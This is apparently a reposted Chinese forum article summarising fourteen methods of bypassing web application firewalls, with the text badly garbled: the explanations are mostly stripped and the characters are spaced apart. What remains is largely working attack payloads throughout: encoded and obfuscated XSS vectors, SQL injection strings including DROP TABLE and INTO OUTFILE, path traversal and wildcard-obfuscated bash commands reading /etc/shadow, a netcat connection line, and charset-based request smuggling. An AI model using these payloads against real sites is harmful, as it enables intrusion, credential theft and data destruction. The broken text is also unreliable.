[18324] 2021-04-02_干货waf绕过的14种方法总结及工具介绍

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-04-02_干货waf绕过的14种方法总结及工具介绍 | w a f 1 4 H A C K   2 0 2 1 - 0 4 - 0 2   j u s t o n e W A F W e b H T T P / H T T P S W e b W e b W A F O S I w e b I P W A F W A F 使 使 W A F W e b   W A F                                 W A F I P 1 . 使 s h o d a n . i o c e n s y s . i o 2 . S P F T X T S P F T X T I P 3 . I P I P s e c u r i t y t r a i l s . c o m   . C T F
W A F W A F 使 8 0 4 4 3 8 0 0 0 8 0 0 8 8 0 8 0 8 0 8 8 W A F c o o k i e W A F W A F W A F W A F G E T c o o k i e c U R L G E T W A F S Q L p l a y l o a d 1   =   1 - 使 X S S p l a y l o a d < s c r i p t >   c o n f i r m < /   s c r i p t > . . / . . / . . / e t c / p a s s w d U R L U R L p l a y l o a d   O R   S L E E P 5 O R u r l 使 H T T P   /   0 . 9 G E T H T T P   /   0 . 9 P O S T F I N R S T W A F w 3 a f     W e b w a f w 0 0 f   W e b B y p a s s W A F   D N S D N S   A   C l o u d F a i l   C l o u d f l a r e   W A F I P W A F 1 . < s c r i p t > c o n f i r m ( ) < / s c r i p t > < S c r I p T > c o n f i r m ( ) < / s C R i P t > S E L E C T   *   F R O M   *   W H E R E   O W N E R   =   ' N A M E _ O F _ D B ' s E L e C t   *   f R o M   *   w H e r E   O W N E R   =   ' N A M E _ O F _ D B '
U R L h t t p : / / e x a m p l e . c o m / i n d e x . p h p ? p a g e _ i d = - 1   U n I o N   S e L e C T   1 , 2 , 3 , 4 2 .   U R L 使 /   U R L 使 B u r p / W A F < S v g / x = " > " / O n L o A D = c o n f i r m ( ) / / % 3 C S v g % 2 F x % 3 D % 2 2 % 3 E % 2 2 % 2 F O n L o A D % 3 D c o n f i r m % 2 8 % 2 9 % 2 F % 2 F W A F U n i O n ( S e L e C t   1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 1 0 ) U n i O n % 2 8 S e L e C t + 1 % 2 C 2 % 2 C 3 % 2 C 4 % 2 C 5 % 2 C 6 % 2 C 7 % 2 C 8 % 2 C 9 % 2 C 1 0 % 2 9 U R L h t t p s : / / e x a m p l e . c o m / p a g e . p h p ? i d = 1 % 2 5 2 f % 2 5 2 a * / U N I O N % 2 5 2 f % 2 5 2 a   / S E L E C T 3 .   U n i c o d e U n i c o d e A S C I I W A F < m a r q u e e   o n s t a r t = p r o m p t ( ) > < m a r q u e e   o n s t a r t = u 0 0 7 0 r u 0 6 f u 0 0 6 d p t ( ) > W A F / ? r e d i r = h t t p : / / g o o g l e . c o m / ? r e d i r = h t t p : / / g o o g l e c o m   ( U n i c o d e   a l t e r n a t i v e ) W A F < m a r q u e e   l o o p = 1   o n f i n i s h = a l e r t ( ) > x m a r q u e e   l o o p 1   o n f i n i s h a l e r t 1 ) > x   ( U n i c o d e   a l t e r n a t i v e ) . . / . . / e t c / s h a d o w % C 0 A E % C 0 A E % C 0 A F % C 0 A E % C 0 A E % C 0 A F e t c % C 0 A F s h a d o w
4 .   H T M L W e b H T M L H T M L " > < i m g   s r c = x   o n e r r o r = c o n f i r m ( ) > & q u o t ; & g t ; & l t ; i m g   s r c = x   o n e r r o r = c o n f i r m & l p a r ; & r p a r ; & g t ;   & # 3 4 ; & # 6 2 ; & # 6 0 ; i m g   s r c = x   o n e r r o r = c o n f i r m & # 4 0 ; & # 4 1 ; & # 6 2 ;   5 . < A   H R E F = " h t t   p : / / 6   6 . 0 0 0 1 4 6 . 0 x 7 . 1 4 7 / " > X S S < / A > 6 . 使 使 使 W A F < s c r i p t > c o n f i r m ( ) < / s c r i p t > < ! - - > < s c r i p t > c o n f i r m / * * / ( ) / * * / < / s c r i p t > W A F / ? i d = 1 + u n i o n + s e l e c t + 1 , 2 - - / ? i d = 1 + u n / * * / i o n + s e l / * * / e c t + 1 , 2 - - /   * S E L E C T   *   / W A F m y s q l U R L i n d e x . p h p ? p a g e _ i d = - 1   % 5 5 n I O N / * * / % 5 3 E l e c T   1 , 2 , 3 , 4             ' u n i o n % a 0 s e l e c t   p a s s   f r o m   u s e r s # U R L i n d e x . p h p ? p a g e _ i d = - 1   / * ! U N I O N * /   / * ! S E L E C T * /   1 , 2 , 3   7 .
W e b W e b h t t p : / / e x a m p l e / c g i / . . / . . / w i n n t / s y s t e m 3 2 / c m d . e x e ? / c + d i r + c : h t t p : / / e x a m p l e / c g i / % 2 5 2 E % 2 5 2 E % 2 5 2 F % 2 5 2 E % 2 5 2 E % 2 5 2 F w i n n t / s y s t e m 3 2 / c m d . e x e ? / c + d i r + c : < s c r i p t > c o n f i r m ( ) < / s c r i p t > % 2 5 3 C s c r i p t % 2 5 3 E c o n f i r m ( ) % 2 5 3 C % 2 5 2 F s c r i p t % 2 5 3 E 8 . 使 / b i n / c a t   / e t c / p a s s w d / ? ? ? / ? ? t   / ? ? ? / ? ? s s ? ? /   ?   t   s / b i n / n c   1 2 7 . 0 . 0 . 1   4 4 3 / ? ? ? / n ?   2 1 3 0 7 0 6 4 3 3   4 4 3 /   ?   n   [ 0 - 9 ] 使 < s c r i p t > c o n f i r m ( ) < / s c r i p t > < s c r i p t > e v a l ( ' c o n ' + ' f i ' + ' r m ( ) ' ) < / s c r i p t > / b i n / c a t   / e t c / s h a d o w
/ b i ' n ' ' ' / c ' ' a t '   / e ' t c ' / s h ' ' a d ' o w B a s h < i f r a m e / o n l o a d = ' t h i s [ " s r c " ] = " j a v a s c r i p t : c o n f i r m ( ) " ' ; > < i f r a m e / o n l o a d = ' t h i s [ " s r c " ] = " j a v " + " a s & T a b ; c r " + " i p t : c o n " + " f i r " + " m ( ) " ' ; > 9 . W A F < s c r i p t > c o n f i r m ( ) < / s c r i p t > < s c r i p t > + - + - 1 - + - + c o n f i r m ( ) < / s c r i p t > < B O D Y   o n l o a d = c o n f i r m ( ) > < B O D Y   o n l o a d ! # $ % & ( ) * ~ + - _ . , : ; ? @ [ / | ] ^ ` = c o n f i r m ( ) > < a   h r e f = j a v a s c r i p t ; a l e r t ( ) > C l i c k M e < a   a a   a a a   a a a a   a a a a a   a a a a a a   a a a a a a a   a a a a a a a a   a a a a a a a a a a   h r e f = j & # 9 7 v & # 9 7 s c r i p t & # x 3 A ; & # 9 7 l e r t ( 1 ) > C l i c k M e 1 0 . W A F C R L F 西 < i f r a m e   s r c = j a v a s c r i p t : c o n f i r m ( h a c k e r ) " > < i f r a m e   > 1 1 . 使 b a s h n u l l B a s h P e r l
/ b i n / c a t   / e t c / s h a d o w / b i n / c a t $ u   / e t c / s h a d o w $ u / b i n / c a t   / e t c / s h a d o w $ u / b i n $ u / c a t $ u   $ u / e t c $ u / s h a d o w $ u / b i n / c a t   / e t c / p a s s w d $ a a a a a a / b i n $ b b b b b b / c a t $ c c c c c c c   $ d d d d d d / e t c $ e e e e e e e / p a s s w d $ f f f f f f f 1 2 . W A F < I M G   > < I M G   > < I M G   > h t t p : / / t e s t . c o m / t e s t ? i d = 1   u n i o n   s e l e c t   1 , 2 , 3 h t t p : / / t e s t . c o m / t e s t ? i d = 1 % 0 9 u n i o n % 2 3 % 0 A % 0 D s e l e c t % 2 D % 2 D % 0 A % 0 D 1 , 2 , 3 < i f r a m e   s r c = j a v a s c r i p t : c o n f i r m ( ) > < / i f r a m e > < i f r a m e   s r c = j & T a b ; a & T a b ; v & T a b ; a & T a b ; s & T a b ; c & T a b ; r & T a b ; i & T a b ; p & T a b ; t & T a b ; : c & T a b ; o & T a b ; n & T a b ; f & T a b ; i & T a b ; r & T a b ; m & T a b ; % 2 8 & T a b ; % 2 9 > < / i f r a m e > 1 3 . 使
使 ? i d = - s q l i t e _ v e r s i o n ( )   U N I O N   S E L E C T   p a s s w o r d s   F R O M   u s e r s   - - ? i d = 1 2 ) ; D R O P   T A B L E   u s e r s   - - ? i d = 1 3 3 )   I N T O   O U T F I L E   x x x   - - 1 4 . W e b W A F I I S   I I S   6 7 . 5 8 1 0 I B M 0 3 7 P O S T   / e x a m p l e . a s p x ? i d 7 = s o m e t e x t   H T T P / 1 . 1 H O S T :   t a r g e t . o r g C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ;   c h a r s e t = u t f - 8 C o n t e n t - L e n g t h :   2 7 i d 2 = ' u n i o n   a l l   s e l e c t   *   f r o m   u s e r s - - U R L P O S T   / e x a m p l e . a s p x ? % 8 9 % 8 4 % F 7 = % A 2 % 9 5 % 9 4 % 8 6 % A 3 % 8 8 % 8 9 % 9 5 % 8 7   H T T P / 1 . 1 H O S T :   t a r g e t . o r g C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d ;   c h a r s e t = i b m 0 3 7 C o n t e n t - L e n g t h :   1 2 7 % 8 9 % 8 4 % F 2 = % 7 D % A 4 % 9 5 % 8 9 % 9 7 % 9 5 % 4 0 % 8 1 % 9 3 % 9 4 % 4 0 % A 2 % 8 5 % 9 3 % 8 5 % 8 4 % A 3 % 4 0 % 5 C % 4 0 % 8 6 % 9 9 % 9 7 % 9 4 % 4 0 % A 4 % A 2 % 8 5 % 9 9 % A 2 % 6 0 % 6 0 使 D N S w a f W e b W A F 稿 j u s t o n e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则